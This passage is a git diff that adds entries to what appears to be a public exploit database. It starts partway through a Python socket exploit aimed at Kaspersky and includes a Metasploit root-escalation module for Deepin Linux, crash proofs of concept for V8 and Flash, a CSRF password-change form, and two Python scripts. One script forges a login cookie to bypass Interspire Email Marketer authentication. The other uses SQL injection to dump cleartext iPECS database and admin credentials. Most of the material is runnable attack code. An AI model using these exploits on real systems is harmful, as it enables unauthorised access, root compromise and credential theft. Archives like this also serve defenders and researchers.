ae0e2fff70d831c501048644f700527d61d1f6cb177948e0ebea8d4a01fa9c7ca2c4b3472bcdf17e3cfb3f54fb791a43f114514b6821390d2c16e23ff9ffb0b0caa508b2952b0a497a24ce0d8ad05734111034a71d57a624855b95594b7f158903f03c02213c8de27644a2026de0c7477f1550f9f39450718ddf185eb9c5f9fc7b545c838970c4f7e87b69c570a873d8f64fe08ed23c7b8275f8bf54f080508bb244fbf3dc852968bd8a63a8787c8e496508c597ae9f617bfb096bebf94cbb736a6438163f61479816da9d88e2a3ea6b50a828d9c2c6f51f34e29f4fe588a41e5e3a53515d474a5a52b357')
+            # Log the packet in hexa and timestamp
+            fileLog = target + ".log"
+            logPacket = open("exploit.log", "w+")
+            logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " -
+Writing to socket: " + binascii.hexlify(bytes(packet))+"\n")
+            logPacket.close()
+
+            # Write bytecodes to socket
+            print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Writing
+to socket: ")
+            s.send(bytes(packet))
+            # Packet sent:
+            print(bytes(packet))
+            try:
+                data = s.recv(4096)
+                print("[" + time.strftime('%a %H:%M:%S') + "]" + " -
+"+ "Data received: '{msg}'".format(msg=data))
+            except socket.error, e:
+                print '[!] Sorry, No data available'
+                continue
+        s.close()
+    except socket.error as error:
+        print error
+        print "Sorry, something went wrong!"
+
+def howtouse():
+    print "Usage: kaspersky.py hostname port"
+    print "[*] Mandatory arguments:"
+    print "[-] Specify a hostname / port"
+    sys.exit(-1)
+
+if __name__ == "__main__":
+    try:
+        # Set target
+        target = sys.argv[1]
+        port = int(sys.argv[2])
+
+        print "[*] Kaspersky KSN 0-Day by Juan Sacco <jsacco@exploitpack.com>"
+        rocksDB(target, port)
+    except IndexError:
+        howtouse()
\ No newline at end of file
diff --git a/exploits/linux/local/44523.rb b/exploits/linux/local/44523.rb
new file mode 100755
index 000000000..c33ee96ad
--- /dev/null
+++ b/exploits/linux/local/44523.rb
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'lastore-daemon D-Bus Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on Deepin Linux systems
+        by using lastore-daemon to install a package.
+
+        The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
+        user in the sudo group to install arbitrary system packages without
+        providing a password, resulting in code execution as root. By default,
+        the first user created on the system is a member of the sudo group.
+
+        This module has been tested successfully with lastore-daemon version
+        0.9.53-1 on Deepin Linux 15.5 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          "King's Way",   # Discovery and exploit
+          'Brendan Coles' # Metasploit
+        ],
+      'DisclosureDate' => 'Feb 2 2016',
+      'References'     =>
+        [
+          [ 'EDB', '39433' ],
+          [ 'URL', 'https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8' ],
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'DefaultTarget'  => 0))
+    register_options([
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def mkdir(path)
+    vprint_status "Creating '#{path}' directory"
+    cmd_exec "mkdir -p #{path}"
+    register_dir_for_cleanup path
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  def command_exists?(cmd)
+    cmd_exec("command -v #{cmd} && echo true").include? 'true'
+  end
+
+  def dbus_priv?
+    res = install_package '', ''
+    (res.include? 'DBus.Error.AccessDenied') ? false : true
+  end
+
+  def install_package(name, path)
+    dbus_send dest: 'com.deepin.lastore',
+              type: 'method_call',
+              path: '/com/deepin/lastore',
+              interface: 'com.deepin.lastore.Manager.InstallPackage',
+              contents: "string:'#{name}' string:'#{path}'"
+  end
+
+  def remove_package(name)
+    dbus_send dest: 'com.deepin.lastore',
+              type: 'method_call',
+              path: '/com/deepin/lastore',
+              interface: 'com.deepin.lastore.Manager.RemovePackage',
+              contents: "string:' ' string:'#{name}'"
+  end
+
+  def dbus_send(dest:, type:, path:, interface:, contents:)
+    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
+  end
+
+  def check
+    %w(lastore-daemon dpkg-deb dbus-send).each do |cmd|
+      unless command_exists? cmd
+        vprint_error "#{cmd} is not installed. Exploitation will fail."
+        return CheckCode::Safe
+      end
+      vprint_good "#{cmd} is installed"
+    end
+
+    unless dbus_priv?
+      vprint_error 'User is not permitted to install packages. Exploitation will fail.'
+      return CheckCode::Safe
+    end
+    vprint_good 'User is permitted to install packages'
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    print_status 'Building package...'
+
+    payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    pkg_name = rand_text_alphanumeric rand(10..15)
+    pkg_path = "#{base_dir}/.#{pkg_name}"
+
+    mkdir "#{pkg_path}/DEBIAN"
+    pkg = "Package: #{pkg_name}\n"
+    pkg << "Version: 0.1\n"
+    pkg << "Maintainer: #{pkg_name}\n"
+    pkg << "Architecture: all\n"
+    pkg << "Description: #{pkg_name}\n"
+    upload "#{pkg_path}/DEBIAN/control", pkg
+    upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &"
+
+    cmd_exec "dpkg-deb --build '#{pkg_path}'"
+
+    unless file_exist? "#{pkg_path}.deb"
+      fail_with Failure::Unknown, 'Building package failed'
+    end
+
+    print_status 'Uploading payload...'
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    print_status 'Installing package...'
+    res = install_package pkg_name, "#{pkg_path}.deb"
+    vprint_line res
+
+    unless res.include? 'object path'
+      fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log'
+    end
+
+    Rex.sleep 15
+
+    print_status 'Removing package...'
+    res = remove_package pkg_name.downcase
+    vprint_line res
+
+    unless res.include? 'object path'
+      print_warning 'Package removal failed. Check /var/log/lastore/daemon.log'
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/dos/44526.txt b/exploits/multiple/dos/44526.txt
new file mode 100644
index 000000000..1816c5114
--- /dev/null
+++ b/exploits/multiple/dos/44526.txt
@@ -0,0 +1,7 @@
+The attached fuzzed swf file causes heap overflow when playing a sound.
+
+This PoC crashes a little bit unreliably, it is the most reliable in the standalone Flash player and Microsoft Edge. 
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44526.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/44527.txt b/exploits/multiple/dos/44527.txt
new file mode 100644
index 000000000..eabbf304e
--- /dev/null
+++ b/exploits/multiple/dos/44527.txt
@@ -0,0 +1,7 @@
+The attached fuzzed swf file causes heap or stack corruption (depending on platform) when rendering a slab.
+
+This PoC crashes a little bit unreliably, it is the most reliable in the standalone Flash player and Microsoft Edge.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44527.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/44528.txt b/exploits/multiple/dos/44528.txt
new file mode 100644
index 000000000..178176d34
--- /dev/null
+++ b/exploits/multiple/dos/44528.txt
@@ -0,0 +1,7 @@
+The attached image causes an info leak in image inflation. It occasionally crashes when rendered, otherwise it displays uninitialized memory as pixels.
+
+To reproduce, put the attached images on a webserver and vist: http://127.0.0.1?img=inflate.png.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44528.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/44529.txt b/exploits/multiple/dos/44529.txt
new file mode 100644
index 000000000..7b032f1fc
--- /dev/null
+++ b/exploits/multiple/dos/44529.txt
@@ -0,0 +1,7 @@
+The attached swf file causes and out-of-bounds write in blur filtering.
+
+This PoC crashes reliably in Firefox for Linux. 
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44529.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/44530.js b/exploits/multiple/dos/44530.js
new file mode 100644
index 000000000..8d645de52
--- /dev/null
+++ b/exploits/multiple/dos/44530.js
@@ -0,0 +1,80 @@
+/*
+https://cs.chromium.org/chromium/src/v8/src/compiler/node-properties.cc?rcl=df84e87191022bf6914f9570069908f10b303245&l=416
+
+Here's a snippet of NodeProperties::InferReceiverMaps.
+      case IrOpcode::kJSCreate: {
+        if (IsSame(receiver, effect)) {
+          HeapObjectMatcher mtarget(GetValueInput(effect, 0));
+          HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
+          if (mtarget.HasValue() && mnewtarget.HasValue()) {
+            Handle<JSFunction> original_constructor =
+                Handle<JSFunction>::cast(mnewtarget.Value());
+
+            if (original_constructor->has_initial_map()) {
+              Handle<Map> initial_map(original_constructor->initial_map());
+              if (initial_map->constructor_or_backpointer() ==
+                  *mtarget.Value()) {
+                *maps_return = ZoneHandleSet<Map>(initial_map);
+                return result;
+              }
+            }
+          }
+          // We reached the allocation of the {receiver}.
+          return kNoReceiverMaps;
+        }
+        break;
+      }
+
+"mnewtarget" is expected to be a constructor which also can be of type JSBoundFunction. But "mnewtarget" is always cast to JSFunction which leads to type confusion.
+
+The PoC seems not to crash in release mode.
+
+Debug mode log:
+#
+# Fatal error in ../../src/objects-inl.h, line 566
+# Check failed: !v8::internal::FLAG_enable_slow_asserts || (object->IsJSFunction()).
+#
+
+==== C stack trace ===============================
+
+    /v8/out.gn/x64.debug/./libv8_libbase.so(v8::base::debug::StackTrace::StackTrace()+0x1e) [0x7f4623e1043e]
+    /v8/out.gn/x64.debug/./libv8_libplatform.so(+0x30907) [0x7f4623db3907]
+    /v8/out.gn/x64.debug/./libv8_libbase.so(V8_Fatal(char const*, int, char const*, ...)+0x1bd) [0x7f4623df876d]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::JSFunction::cast(v8::internal::Object*)+0x64) [0x7f46226584a4]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::Handle<v8::internal::JSFunction> const v8::internal::Handle<v8::internal::JSFunction>::cast<v8::internal::JSFunction>(v8::internal::Handle<v8::internal::JSFunction>)+0x23) [0x7f4622651173]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::NodeProperties::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::ZoneHandleSet<v8::internal::Map>*)+0x435) [0x7f4622c24a75]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, std::__1::vector<v8::internal::Handle<v8::internal::Map>, std::__1::allocator<v8::internal::Handle<v8::internal::Map> > >*)+0x50) [0x7f4622b8b820]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ExtractReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, std::__1::vector<v8::internal::Handle<v8::internal::Map>, std::__1::allocator<v8::internal::Handle<v8::internal::Map> > >*)+0x202) [0x7f4622b82632]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceNamedAccessFromNexus(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, v8::internal::Handle<v8::internal::Name>, v8::internal::compiler::AccessMode)+0x2e6) [0x7f4622b822b6]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceJSStoreNamed(v8::internal::compiler::Node*)+0x298) [0x7f4622b7c2c8]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::Reduce(v8::internal::compiler::Node*)+0x11f) [0x7f4622b78f7f]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::Reduce(v8::internal::compiler::Node*)+0x285) [0x7f4622ad8c55]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceTop()+0x44f) [0x7f4622ad874f]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceNode(v8::internal::compiler::Node*)+0x1bc) [0x7f4622ad7cfc]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceGraph()+0x2d) [0x7f4622ad89bd]
+    /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::InliningPhase::Run(v8::internal::compiler::PipelineData*, v8::internal::Zone*)+0x58a) [0x7f4622c46e2a]
+
+PoC:
+*/
+
+// Flags: --allow-natives-syntax --enable_slow_asserts
+
+class Base {
+    constructor() {
+        this.x = 1;
+    }
+}
+
+class Derived extends Base {
+    constructor() {
+        // JSCreate emitted I guess.
+        super();
+    }
+}
+
+let bound = Object.bind();
+Reflect.construct(Derived, [], bound);  // Feed a bound function as new.target to the profiler, so HeapObjectMatcher can find it.
+
+%OptimizeFunctionOnNextCall(Derived);
+
+new Derived();
\ No newline at end of file
diff --git a/exploits/php/webapps/44503.txt b/exploits/php/webapps/44503.txt
new file mode 100644
index 000000000..0d8ead63a
--- /dev/null
+++ b/exploits/php/webapps/44503.txt
@@ -0,0 +1,51 @@
+# Exploit Title: UK Cookie Consent v2.3.9 - Persistent Cross-Site Scripting
+# Date: 2018-04-22
+# Exploit Author: B0UG
+# Vendor Homepage: https://catapultthemes.com/
+# Software Link: https://en-gb.wordpress.org/plugins/uk-cookie-consent/#description
+# Version: Tested on version 2.3.9 (older versions may also be affected)
+# Tested on: WordPress
+# Category : Webapps
+# CVE: CVE-2018-10310
+
+I. VULNERABILITY
+-------------------------
+Persistent Cross-Site Scripting
+ 
+II. BACKGROUND
+-------------------------
+UK Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website.
+
+III. DESCRIPTION
+-------------------------
+A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser.
+
+IV. PROOF OF CONCEPT
+-------------------------
+1) Access WordPress control panel.
+2) Navigate to the 'Pages'.
+3) Add a new page and insert the script you wish to inject into the page title.
+4) Now navigate to 'Settings' and select 'Cookie Consent'.
+5) Now click on the 'Content' tab.
+6) Your injected script will now be executed.
+
+V. IMPACT
+-------------------------
+An attacker can execute malicious code in a victim user's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
+ 
+VI. SYSTEMS AFFECTED
+-------------------------
+WordPress websites running "UK Cookie Consent" plugin version 2.3.9  (older versions may also be affected).
+ 
+VII. REMEDIATION
+-------------------------
+Update to the latest version available. Implement a web application such as Wordfence.
+
+VIII. DISCLOSURE TIMELINE
+-------------------------
+April 22, 2018 1: Vulnerability identified.
+April 22, 2018 2: Informed developer of the vulnerability.
+April 23, 2018 3: Developer acknowledged the vulnerability.
+April 23, 2018 4: Developer issued a security patch.
+
+Special thanks goes to the team at Catapult Themes for their fast response, great understanding and patching the issue.
\ No newline at end of file
diff --git a/exploits/php/webapps/44504.txt b/exploits/php/webapps/44504.txt
new file mode 100644
index 000000000..dc6841527
--- /dev/null
+++ b/exploits/php/webapps/44504.txt
@@ -0,0 +1,23 @@
+# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery
+# Date: 2018-04-23
+# Exploit Author: jiguang (s1@jiguang.in)
+# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
+# Software Link: https://github.com/wuzhicms/wuzhicms
+# Version: 4.1.0
+# CVE: CVE-2018-10312
+
+An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132)
+There is a  csrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset
+After the member logged in. open the exp page
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
+      <input type="hidden" name="password" value="yuduo" />
+      <input type="hidden" name="password2" value="yuduo" />
+      <input type="hidden" name="submit" value="ç&#161;&#174;&#32;å&#174;&#154;" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/44512.txt b/exploits/php/webapps/44512.txt
new file mode 100644
index 000000000..b01273b7b
--- /dev/null
+++ b/exploits/php/webapps/44512.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Monstra CMS 3.0.4 allows remote attackers to delete folder via an get request
+# Date: 2018-03-26
+# Exploit Author: Wenming Jiang
+# Vendor Homepage: https://github.com/monstra-cms/monstra
+# Software Link: https://github.com/monstra-cms/monstra
+# Version: 3.0.4
+# Tested on: macos 10.12.6, php 5.6, apache2.2.29
+# CVE :CVE-2018-9038
+
+
+Description:
+Monstra CMS 3.0.4 allows remote attackers to delete folder via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request.
+
+
+Steps to Reproduce:
+1、Log in as a user with page editing permissions
+2、Request http://your_site/admin/index.php?id=filesmanager&delete_dir=./&path=uploads
+3、The uploads folder will be deleted.
+
+
+Poc code:
+GET /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de HTTP/1.1
+Host: localhost:8000
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost:8000/monstra/admin/index.php?id=filesmanager&path=uploads/
+Accept-Language: zh,zh-CN;q=0.9,en;q=0.8,zh-TW;q=0.7
+Cookie: SQLiteManager_currentLangue=2; PHPSESSID=882dd1e203c979cedba4524f8107eca3; _ga=GA1.1.1742657188.1524382699; _gid=GA1.1.918663288.1524382699
+Connection: close
+
+
+
+Vulnerability Type:
+Insecure Permissions
+
+
+Expected Behavior:
+deleted uploads folder
+
+
+
+Possible Solutions:
+Strictly filter the delete_dir parameter and replace './' with '_/'
\ No newline at end of file
diff --git a/exploits/php/webapps/44513.py b/exploits/php/webapps/44513.py
new file mode 100755
index 000000000..1609d812d
--- /dev/null
+++ b/exploits/php/webapps/44513.py
@@ -0,0 +1,156 @@
+'''
+# Exploit Title: Interspire Email Marketer - Remote Admin Authentication Bypass
+# Google Dork: intitle:"Control Panel" + emailmarketer
+# Date: 4-22-18
+# Exploit Author: devcoinfet
+# Vendor Homepage: www.interspire.com/emailmarketer 
+# Software Link: Can't legally provide link but can be found on net 
+# Version: [6.1.3-6.1.6]
+# Tested on: Below 6.1.6
+# CVE : CVE-2017-14322
+
+https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html 
+https://github.com/joesmithjaffa/CVE-2017-14322 
+thanks to above Researchers
+
+1. Description
+
+
+
+this is used like this
+--------------------------
+exploit.py url/email-marketer/admin/index.php
+
+
+2. Proof of Concept
+'''
+
+
+import requests
+import sys
+from bs4 import BeautifulSoup
+from pprint import pprint
+
+
+def cookie_cutter(url):
+    with requests.Session() as s:
+       s.get(url)
+       r = s.get(url)
+       response_regex = r.text
+       print("requesting initial Cookie\n")
+       print(str(r.headers)+"\n")
+       
+       for key,value in s.cookies.items():
+           if key and "IEMSESSIONID" in key:
+          
+              s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
+       print("Attempting To Posion 2nd request with Forged Cookie\n")
+       print("-" * 25)
+       r = s.get(url)
+       response_regex2 = r.text
+       print response_regex2
+       print(str(r.headers) + "\n")
+       if response_regex != response_regex2:
+
+          for key,value in s.cookies.items():
+              if "IEMSESSIONID" in key:
+                 try:
+                    #using session riding from previous cookie we grab the info we want :)
+                    bounce_info_grab(url,value)
+                    app_info_grab(url,value)
+                    privt_info_grab(url,value)
+                 except:
+                     pass
+                 return value,r.text
+
+
+def bounce_info_grab(url,session_to_ride):
+    url_grab = url+"?Page=Settings&Tab=2"
+    print(url_grab)
+    with requests.Session() as s:
+       s.get(url_grab)
+       s.cookies.set('IEMSESSIONID',session_to_ride)
+       r = s.get(url_grab)
+       response_regex = r.text
+       soup = BeautifulSoup(response_regex,'html5lib')
+       div = soup.find('div', id='div7')
+      
+        
+       outfile = open("bounce_report.txt",'w')
+       dataout = """<html><head>Report</head><title>Report</title>
+                    <body>""" + str(div) +"""</body></html>"""
+       outfile.write(dataout)
+       outfile.close()
+       for divy in div.contents:
+           print(divy)
+          
+def app_info_grab(url,session_to_ride):
+    url_grab = url+"?Page=Settings&Tab=2"
+    print(url_grab)
+    with requests.Session() as s:
+       s.get(url_grab)
+       s.cookies.set('IEMSESSIONID',session_to_ride)
+       r = s.get(url_grab)
+       response_regex = r.text
+       soup = BeautifulSoup(response_regex,'html5lib')
+       div = soup.find('div', id='div1')
+    
+        
+       outfile = open("application_settings_report.txt",'w')
+       dataout = """<html><head>Report</head><title>Report</title>
+                    <body>""" + str(div) +"""</body></html>"""
+       outfile.write(dataout)
+       outfile.close()
+       for divy in div.contents:
+           print(divy)   
+    
+def privt_info_grab(url,session_to_ride):
+    url_grab = url+"?Page=Settings&Tab=2"
+    print(url_grab)
+    with requests.Session() as s:
+       s.get(url_grab)
+       s.cookies.set('IEMSESSIONID',session_to_ride)
+       r = s.get(url_grab)
+       response_regex = r.text
+       soup = BeautifulSoup(response_regex,'html5lib')
+       div = soup.find('div', id='div8')
+     
+        
+       outfile = open("privtlbl_settings_report.txt",'w')
+       dataout = """<html><head>Report</head><title>Report</title>
+                    <body>""" + str(div) +"""</body></html>"""
+       outfile.write(dataout)
+       outfile.close()
+       for divy in div.contents:
+           print(divy)   
+    
+def main():
+    url = sys.argv[1]
+    print  "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n"
+    print "-" * 25
+    try:
+       session_rider_value,content = cookie_cutter(url)
+       print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n"
+       print "-" * 25
+       print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
+       print "-" * 25
+       print  session_rider_value+"\n"
+       print "-" * 25
+    except:
+       print "Target Is Not Vulnerable"
+       pass
+   
+    
+
+main()
+
+'''
+When Running this, if it is succesful check for 3 files in the directory of exploit to find crucial internal configs in Html format
+do not use this for bad just dont do it please.
+ 
+
+3. Solution:
+   
+Update to version 6.1.6 atleast
+http://www.interspire.com/emailmarketer 
+'''
\ No newline at end of file
diff --git a/exploits/php/webapps/44515.py b/exploits/php/webapps/44515.py
new file mode 100755
index 000000000..8e2beeb2c
--- /dev/null
+++ b/exploits/php/webapps/44515.py
@@ -0,0 +1,138 @@
+# -*- coding: utf-8 -*-
+
+
+# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump
+# Vendor Notification: 03-03-2018 - No response
+# Initial CVE: 04-04-2018
+# Disclosure:  21-04-2018
+# Exploit Author: Berk Cem Göksel
+# Contact: twitter.com/berkcgoksel || bgoksel.com
+# Vendor Homepage: http://www.ipecs.com/
+# Version: A.1Ac and possibly earlier
+# Tested on: Windows 2008 R2 x64
+# CVE-2018-9245:  Multiple SQL injections
+# CVE-2018-10285: Incorrect access control
+# CVE-2018-10286: Sensitive information disclosure
+
+
+#--------Description--------#
+#
+#
+# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive
+# information such as cleartext database and NMS login credentials, use incorrect
+# access control mechanisms, are vulnerable to MiTM attacks and are prone to
+# SQL injection attacks on multiple parameters.
+#
+# This script dumps some sensitive information.
+#
+#
+# Why use it?
+#
+# Normally, you can bypass the login through the SQLi but will get "kicked out".
+# Thankfully, we can leverage this to extract the actual admin credentials for
+# the web app. In order to do this, we must first dump the database
+# credentials in cleartext.
+#
+#
+
+
+
+# Usage = python cred_dump.py IP_adress port
+# Example = python cred_dump.py 192.168.1.35 80
+
+
+from sys import argv
+import sys
+import os
+import time
+import requests
+import re
+
+
+
+if len(argv) != 3:
+
+    print "The script takes two mandatory arguments."
+    print "\nExample usage:  python cred_dump.py 192.168.1.35 80"
+    sys.exit("Exiting...")
+
+arg,IP,port=argv
+
+#Log in through SQLi. Otherwise the next POST request is rejected.
+sqli_path = "/nms/php/module/main/main_login.php"
+sqli_url = "http://" + IP + ":" + port + sqli_path
+sqli_cookies = {"mainTab_selectedChild": "sysinfoTab"}
+sqli_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/index.html", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
+sqli_data={"id": "1", "passwd": "1' or 1=1--"}
+r = requests.post(sqli_url, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data)
+print(r.status_code, r.reason)
+time.sleep(1)
+
+
+#Thanks to incorrect access control we can
+#dump cleartext database credentials
+dump_path = "/nms/php/module/main/main_start.php"
+dump_url = "http://" + IP + ":" + port + dump_path
+nms_cookie = {"mainTab_selectedChild": "sysinfoTab"}
+nms_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
+nms_data={"command": "nms_start", "client_id": "20"}
+r2 = requests.post(dump_url, headers=nms_headers, cookies=nms_cookie, data=nms_data)
+print(r2.status_code, r2.reason)
+
+db_cred_dump = r2.content
+time.sleep(1)
+
+#Extract db user and db pass from the dump
+m = re.search(r"db_user:'(.*)'.*db_pwd:'([^']*)", db_cred_dump)
+
+if m is not None:
+    postgre_db_user = m.group(1)
+    postgre_db_pwd = m.group(2)
+else:
+
+    print "Something went wrong parsing the credentials. Check the dump manually."
+
+
+client_id = "2" #Doesn't really matter
+user_id = "10" #Doesn't matter either
+db_user = postgre_db_user # This does matter
+db_pwd =  postgre_db_pwd #  So does this
+
+
+#Use db user and password to extract admin credentials for the NMS
+users_path = "/nms/php/module/init/module_init.php"
+users_url = "http://" + IP + ":" + port + users_path
+users_cookies = {"mainTab_selectedChild": "sysinfoTab"}
+users_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
+users_data={"command": "init_configuration", "client_id": "2", "user_id": user_id, "db_user": db_user, "db_pwd": db_pwd, "mfimSeq": "0", "req_system_id": "0", "req_system_name": ''}
+r3 = requests.post(users_url, headers=users_headers, cookies=users_cookies, data=users_data)
+
+
+print(r3.status_code, r3.reason)
+
+user_dump = r3.content
+
+
+print "Done. You can log in to the postgresql database using the below credentials."
+print "\ndb_user: " + postgre_db_user
+print "db_pwd: " + postgre_db_pwd
+print "\nAnd/Or you can log in to the NMS using the following credentials"
+m1 = re.search(r"userList:\[\[\d,'([^']*)','([^']*)", user_dump)
+
+if m1 is not None:
+    nms_admin = m1.group(1)
+    nms_pwd = m1.group(2)
+    print "\ndb_admin: " + nms_admin
+    print "db_pwd: " + nms_pwd
+else:
+    print "\nDid not get nms_admin and nms_pwd. Check the dump manually."
+
+
+dumpfile = open("ipecsnms_dump.txt","w")
+
+dumpfile.write(db_cred_dump)
+dumpfile.write(user_dump)
+dumpfile.close()
+
+print "\nRaw output written to ipecsnms_dump.txt for further username and group enumeration."
+print "Have fun!"
\ No newline at end of file
diff --git a/exploits/php/webapps/44520.html b/exploits/php/webapps/44520.html
new file mode 100644
index 000000000..7c2accafc
--- /dev/null
+++ b/exploits/php/webapps/44520.html
@@ -0,0 +1,42 @@
+<!--
+# Exploit Title:  Plugin to Wordpress Woo Import Export 1.0 RCE – Unlink
+# Date: 24/04/2018
+# Exploit Author: Lenon Leite
+# Vendor Homepage: * https://wordpress.org/plugins/woo-import-export-lite/
+# Software Link: * https://wordpress.org/plugins/woo-import-export-lite/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version:  1.0
+# Tested on: Ubuntu 16.1
+
+
+1 - Description
+
+
+   - Type user access: any user registered.
